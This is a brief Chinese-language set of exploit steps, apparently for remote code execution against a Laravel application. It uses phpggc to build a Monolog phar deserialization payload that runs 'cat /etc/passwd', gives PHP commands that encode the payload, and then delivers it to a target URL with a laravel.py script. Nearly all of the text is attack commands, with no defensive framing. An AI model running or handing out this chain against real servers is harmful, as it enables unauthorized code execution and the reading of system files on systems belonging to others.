生成自定义命令的phar包:
php -d'phar.readonly=0' ./phpggc monolog/rce1 system "cat /etc/passwd" --phar phar -o php://output | base64 -w0
php -a 进入php命令行环境
$fp = fopen('php://output', 'w');
stream_filter_append($fp, 'convert.quoted-printable-encode');
$size = "";
fwrite($fp, iconv('utf-8','utf-16le',$size));
将生成好的payload保存为一个文件,然后利用脚本指定:
python laravel.py --url "http(s)://192.168.0.109:8000/" --phar test.phar